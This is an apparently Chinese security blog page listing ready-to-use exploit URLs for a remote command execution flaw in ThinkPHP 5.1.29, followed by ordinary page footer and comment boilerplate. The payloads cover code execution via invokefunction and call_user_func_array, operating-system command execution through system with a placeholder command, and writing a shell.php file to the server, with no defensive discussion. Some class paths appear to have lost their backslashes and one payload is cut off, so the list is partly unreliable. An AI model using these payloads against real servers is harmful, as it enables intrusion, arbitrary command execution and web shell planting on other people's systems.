Thinkphp 5.1.29 远程命令执行漏洞

1、代码执行

http://www.0-sec.org/?s=index/thinkRequest/input&filter=phpinfo&data=1

http://www.0-sec.org/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://www.0-sec.org/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

2、命令执行

http://www.0-sec.org/?s=index/thinkRequest/input&filter=system&data=操作系统命令

http://www.0-sec.org/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

http://www.0-sec.org/?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

 

3、写入文件

http://www.0-sec.org/?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

http://www.0-sec.org/?s=index/thinkviewdriverPhp/display&content=%3C?php%20phpinfo();?%3

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像后魔0